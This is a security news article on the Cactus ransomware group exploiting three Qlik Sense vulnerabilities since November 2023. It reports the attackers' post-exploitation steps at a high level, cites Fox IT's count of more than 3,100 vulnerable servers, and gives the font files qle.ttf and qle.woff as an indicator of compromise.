In an ongoing campaign that began in November, actors associated with the Cactus ransomware group are exploiting three vulnerabilities in the Qlik Sense data visualization platform to deploy ransomware, and researchers warn that there are thousands of vulnerable instances online at the moment.
The first indications of the activity emerged in November, when researchers observed attackers targeting the Qlik Sense vulnerabilities (CVE-2023-41265, CVE-2023-41266, and CVE-2023-48365) in sporadic attacks. Qlik Sense had released patches for the bugs in August after researchers with Praetorian disclosed them to the vendor. Three months later, the Cactus ransomware attacks began and they all followed a similar pattern, from intrusion to deployment of post-exploitation tools to deployment of the ransomware itself.
“Following exploitation of Qlik Sense installations, the observed execution chain was consistent between all intrusions identified and involves the Qlik Sense Scheduler service (Scheduler.exe) spawning uncommon processes. The threat actors leveraged PowerShell and the Background Intelligent Transfer Service (BITS) to download additional tools to establish persistence and ensure remote control,” an analysis by Arctic Wolf from November says.
Among the tools the actors downloaded were MangeEngine UEMS, AnyDesk, and PuTTY Link. The attackers also disabled some security applications, changed admin passwords on compromised systems, and set up an RDP tunnel, which they used for lateral movement. Researchers say the attackers also are feeding false information about their intrusions to victims in an effort to confuse them.
“Since November 2023, the Cactus ransomware group has been actively targeting vulnerable Qlik Sense servers. These attacks are not just about exploiting software vulnerabilities; they also involve a psychological component where Cactus misleads its victims with fabricated stories about the breach. This likely is part of their strategy to obscure their actual method of entry, thus complicating mitigation and response efforts for the affected organizations,” Willem Zeeman and Yun Zheng Hu of Fox IT said in a new analysis of the Cactus ransomware campaign.
Based on a scan from April 17, the Fox IT researchers identified more than 3,100 Qlik Sense servers that are vulnerable to the exploits used by the Cactus ransomware actors. The largest number of vulnerable servers are in the United States.
Cactus is a relatively young ransomware group, having emerged in early 2023. The group typically has exploited bugs in VPN appliances, along with the Qlik Sense servers, to gain initial access to a network. The highest profile intrusion on the group’s scorecard is an attack on Schneider Electric in January.
Organizations running potentially vulnerable Qlik Sense instances can check for the presence of two font files, qle.ttf and qle.woff, as indications of compromise. The attackers use those files, which are not part of the default installation of the server, to store command output.
“When the indicator of compromise artefact is present on a remote Qlik Sense server, it can imply various scenarios. Firstly, it may suggest that remote code execution was carried out on the server, followed by subsequent patching to address the vulnerability (if the server is not vulnerable anymore). Alternatively, its presence could signify a leftover artefact from a previous security incident or unauthorised access,” the Fox IT analysis says.